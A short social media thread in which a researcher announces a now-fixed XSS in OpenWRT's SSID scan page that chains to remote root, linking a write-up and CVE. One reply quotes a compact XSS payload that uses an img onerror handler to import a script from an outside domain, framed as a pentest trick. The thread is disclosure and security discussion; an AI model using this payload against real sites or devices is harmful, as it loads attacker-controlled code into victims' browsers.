sashMar 19
Rooting OpenWRT from the parking lot: I discovered an XSS in the OpenWRT SSID scan page, that can be chained to remote root access 👾
Write-up and demo: https://mxsasha.eu/posts/openwrt-ssid-xss-to-root/
CVE-2026-32721, fixed in 24.10.6 / 25.12.1
Show threadFabian ¯\_(ツ)_/¯Mar 19

@sash TIL that this works:

<a id=s href=//domain/x.js>
<img src=x onerror=import(s)>

This might come in handy in future pentests :)

Show threadsash
@BafDyce Yeah that took me a bit of time to find. An alert(1) fits easy of course, but I have the most fun if I can show a full running exploitation to something practical :)
Mar 19 at 5:32pmWeb